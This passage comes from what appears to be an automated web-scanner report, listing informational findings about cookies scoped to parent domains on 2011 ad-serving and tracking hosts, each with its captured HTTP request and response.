Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=539292&ct=107784&cn=1&epid=&esid=&cf=728X90&rq=1&dw=728&cwu=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work&cwr=&mrnd=35185151&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q; 538518_3_106142_-1=1316221267893; 539292_4_107784_-1=1316221501193

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/300
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Sat, 17 Sep 2011 01:45:49 GMT
Content-Length: 4640
Connection: close
Set-Cookie: 539292_4_107784_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WC=59987_1_3ExLT; Domain=.contextweb.com; Expires=Mon, 16-Sep-2041 21:45:48 GMT; Path=/
Set-Cookie: CDSActionTracking6=FThamvpMfUa4|PpAVCxNh2PJr|539292|3102|7113|59987|135586|107784|4|0|0|bostonherald.com|2|8|1|0|2|1|2|FT049.EMON2.EHEX1.SMTC1.FACO1|1|0|0NHN21JG2RchDYX7G0tJH6jJgXPyCqsz|I|3Ebil|3P3AN; Domain=.contextweb.com; Expires=Sun, 16-Oct-2011 21:45:48 GMT; Path=/
Set-Cookie: vf=724; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3CIFRAME%20SRC%3D%22http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN4441.contextweb.com%2FB5620293.7%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fcdslog.contextweb.com%2FCDSLogger
...[SNIP]...

11.179. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538518&ct=106142&cn=1&epid=&esid=&cf=300X250&rq=1&dw=300&cwu=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&cwr=&mrnd=26611780&if=3&tl=-1&pxy=&cxy=&dxy=&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/unified/300x250/bh_656864_29757782?t=1316239296793&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DMiddle1%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Fnews%252Fhome&refer=http%3A%2F%2Fwww.bostonherald.com%2Fnews%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; FC1-WCR=132982_1_3DL0Q

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP203
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 12/120
Content-Type: application/x-javascript;charset=UTF-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 1960
Date: Sat, 17 Sep 2011 01:10:33 GMT
Connection: close
Set-Cookie: 538518_3_106142_-1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 538518_3_106142_-1=1316221833011; Domain=.contextweb.com; Path=/
Set-Cookie: vf=2; Domain=.contextweb.com; Expires=Sat, 17-Sep-2011 04:00:01 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20src%3D%22http%3A%2F%2Ftag.admeld.com%2Fpassback%2Fjs%2F610%2Funified%2F300x250%2F8%2Fmeld.js%22%3E%3C%2Fscript%3E%3Cdiv%20style%3D%22display%3Anone%3Bwid
...[SNIP]...

11.180. http://tenzing.fmpub.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tenzing.fmpub.net
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?t=s&n=421 HTTP/1.1
Host: tenzing.fmpub.net
Proxy-Connection: keep-alive
Referer: http://www.bradsdeals.com/dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltuid=1e26f8d5f332f1261c9af6b2d31021eb; vuid=1e26f8d5f332f1261c9af6b2d31021eb

Response

HTTP/1.0 204 No Content
Date: Sat, 17 Sep 2011 01:36:04 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: ltuid=7b1c7a91b033a04c133102db8c6d238d9; expires=Sat, 17-Sep-2016 01:36:04 GMT; path=/; domain=.fmpub.net
Set-Cookie: vuid=7b1c7a91b033a04c133102db8c6d238d9; expires=Sat, 17-Sep-2011 02:06:04 GMT; path=/; domain=.fmpub.net
Content-Length: 0
X-Server: adserver5.tor.fmpub.net
Connection: close
Content-Type: application/x-javascript


11.181. http://testdm.travelers.com/trvwics.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://testdm.travelers.com
Path:   /trvwics.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993 HTTP/1.1
Host: testdm.travelers.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1316220790&click=http://ads.bluelithium.com/clk?3,eAGlUU1vm0AU.DNVD5XLsl.sErSqltgmBGNibIeQS7SwxghDcaljB..60sRWeu.oSTN6hzczehA7DFqI5VpRvbELnWEHYsSILiyq9ch0HAdDTDm2KLdGtHKVDGbak-4vf7-WH-j294uL.Ev-RbtSDuNNp8Fx4HcE6vfbRf4njZN4cTUaePtxDidPhR77VzspxylNk3mTnn00S9an9JwfwtW0Dm9hGSU-nK1y8rzSu3D12My9-S78TCVG5eGwvwFgW7eZqg3VaaNXZdsaeduApe8JSDuiXi1IQCgYZxxjAxLCqW3zQWCE3zeImoQwBMaifWletmApEISUI2wRfhPGk1uQilTeRRGYPD0IiIdvIGZzG8yE9VpObBT40UO3l.G-WtXGqVqc.bDUTO3omeG1dOFCAldw2BfLdeulzek7uL-cMRm3KcImYSAQVBKU3PmdzKsoVvPDcxw9mhJIYSFOBkMQCxN8-3Jt3Tbbf-q-lR1QGjTdJgef8X90m0KosjNz3R5rrLHuKe1P5THraZUh8.j10O42P0VGGNWKcA51YROTm1Azy-ZK2RpCS2V.AGxotwo=,
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: redUmbrella=BD27701E6D77E3FB7CEC6F2728F9B165C580796943B8785C1738755EA976ADED3F9E774C; ad_guid_imp=02681f8c-adb3-47e9-b8c3-1bfbf322e8e8~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/06/2011 08:48.16.314 AM EDT

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Content-Type: image/gif
Expires: Thu, 01 Dec 1994 16:00:00 GMT
P3P: CP="NON ADM DEV TAI PSA PSD IVA OUR IND UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: ad_guid_imp=a3102062-ba1a-45de-826e-d21223ca6ccb~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/16/2011 08:55.02.373 PM EDT; Domain=.travelers.com; Expires=Sun, 16-Sep-12 00:55:02 GMT; Path=/
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

11.182. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FPhotoSlideShow%2FYAHOO_143_B2C_Mail_Expandable_954x60%2CC%3DMail%2CP%3DYahoo%2CK%3D3078101/0.9137649598997086/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

11.183. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.21918878913857043/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:28 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@2@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

11.184. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.3687601247802377/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@3@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:16 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@4@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

11.185. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.558339134324342/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@1@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

11.186. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_PushDown_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3096072/0.9227102545555681/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@2@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:40 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234.3096072@3@234; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

11.187. http://traffic.outbrain.com/network/redir  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://traffic.outbrain.com
Path:   /network/redir

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /network/redir?key=467a26e36b344d031207fb454f356be4&rdid=231534154&type=YLD_def_ch&in-site=true&req_id=da23b34cfa8657c71e50520363d1bbbe&agent=blog_JS_rec&recMode=4&reqType=1&wid=100&imgType=0&refPub=347&prs=false&scp=false&version=42206&idx=0 HTTP/1.1
Host: traffic.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=7a957d2b-640c-464a-8acd-8219f3607c99; tick=1316220942842; _lvs2="7o9zvLIDBgZ/PDZJG4J4VcCxVx+pz+vfyPm975gFPm+3JT8CAr5BQAcO/CD2iJ2OomCz617Au40="; _lvd2="PHPHrMMi4tB/TUzMDhNLuExtgrPUidZw2SkL41O19PL40iJ3cmuxL0CBz/AZPclyarqHKgLRZADwwyrf9Wxp503sC1vv7gThts/kVuXGq+6RePDwdpIv9I9eUye8TAoxesWFaLltsC0="; _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; recs-6a9250000f8bdf31c8744c5bafc327c0="WOCZPPRgUVeQ3XCS2OoI48rf6g9SSjSCZlMhWyZJP/HjJ1nS2BO6WvFWNYQF78qoU+fNRUM+rQBZCc9A1uQeXHxeY8GsogNrScHQXkaR7ugqy2ogff13YSmXftEP5JyF9XVu3bYtlRJ5WOXcO9UcZQ=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: _rcc2=H6lta0Gb5dPegbOhXE7G4uRdkwHPmlC5; Domain=outbrain.com; Expires=Sat, 13-Oct-2012 01:00:13 GMT; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Content-Length: 348
Date: Sat, 17 Sep 2011 01:00:12 GMT

<html>
   <body onload="document.location.replace('http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/')">
       <form method="get" action="h
...[SNIP]...

11.188. http://u-ads.adap.tv/a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://u-ads.adap.tv
Path:   /a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/h/HuqeLZgU_XaX8g16tMn8bSkO7yiAt1QCn5DKEyqYSJq69nbfVmH21Q==?cb=1316239703&pet=preroll&pageUrl=newsinc.com&eov=eov HTTP/1.1
Host: u-ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: unique_ad_source_impression="20718%2C20716__TIME__2011-09-14+05%3A39%3A11"; asptvw1="as-2%2C1%2C2011-09-14%2F08-14-57"; adsrcvw1="27169%2C1%2C2011-09-15%2F07-14-57+c17252%2C1%2C2011-09-21%2F07-14-57+c17667%2C1%2C2011-09-15%2F05-45-56+27168%2C1%2C2011-09-15%2F05-39-11+c17253%2C1%2C2011-09-21%2F05-39-11"; creativeViews="{\"v\":1,\"views\":[{\"id\":9866,\"ts\":1316003951,\"cts\":null},{\"id\":9699,\"ts\":1316009697,\"cts\":null}]}"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"24\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"2\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"21\":{\"f\":1318575600,\"e\":1318575600,\"s\":[],\"a\":[]},\"27\":{\"f\":1318575600,\"e\":1323759600,\"s\":[],\"a\":[]}}}"; rtbData0="key=adnetik:value=f9bdca69-e609-4297-9145-48ea56a0756c:expiresAt=Wed+Nov+02+17%3A44%3A53+PDT+2011:32-Compatible=true,key=turn:value=2944787775510337379:expiresAt=Wed+Sep+21+05%3A39%3A13+PDT+2011:32-Compatible=true,key=tidaltv:value=0fc5bd89-5ab4-4635-8ff8-18b58e6e3f77:expiresAt=Sun+Nov+13+06%3A14%3A58+PDT+2011:32-Compatible=true,key=dataxu:value=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F:expiresAt=Sun+Nov+13+06%3A15%3A00+PST+2011:32-Compatible=true"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-16+18%3A06%3A19"; marketTransaction="true__TIME__2011-09-14+05%3A39%3A04"; adaptv_page_url=oOt0lqLFswM_

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Connection: Keep-Alive
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-16+18%3A06%3A58";Path=/;Domain=.adap.tv;Expires=Mon, 16-Sep-13 01:06:58 GMT
Content-Type: text/xml; charset=iso-8859-1
Set-Cookie: marketTransaction="true__TIME__2011-09-14+05%3A39%3A04";Path=/;Domain=.adap.tv;Expires=Fri, 14-Oct-11 12:39:03 GMT
Set-Cookie: adaptv_page_url=oOt0lqLFswM_;Path=/;Domain=.adap.tv
Content-Length: 104

<?xml version="1.0" encoding="UTF-8"?><VAST version="2.0"><error><![CDATA[Err code: 3]]></error></VAST>

11.189. http://u-ads.adap.tv/a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://u-ads.adap.tv
Path:   /a/h/HuqeLZgU_Xbwoj9zW9AgbDCxmf2_Fc99

Issue detail

